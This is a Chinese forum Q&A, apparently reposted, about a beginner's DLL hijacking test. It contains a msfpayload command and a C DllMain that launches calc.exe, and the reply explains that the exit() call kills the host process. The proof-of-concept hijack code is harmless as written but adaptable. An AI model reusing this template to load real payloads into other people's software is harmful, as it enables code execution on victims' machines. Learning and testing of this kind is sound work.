嗨,大家好,我是Dll Hijacking的新手。我的问题很少,希望您能帮助我澄清我的疑问。
假设我使用msfpayload生成calc dll
msfpayload windows/exec CMD=calc.exe D > abc.dll
由msfpayload生成的dll文件可以正常工作,并且计算器会与软件一起提示。
所以我用了下面的C代码:
#include <windows.h>
int owned()
{
WinExec("calc", 0);
exit(0);
return 0;
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
owned();
return 0;
}
当我对此进行编译并使用时,只有计算器会提示。该软件将无法执行。这是为什么?我使用MinGW GCC编译器进行编译。
该软件将无法执行。[这是为什么?
几乎可以肯定是因为owned()打电话exit()。这将终止该过程。
本文收集自互联网,转载请注明来源。
如有侵权,请联系 [email protected] 删除。
我来说两句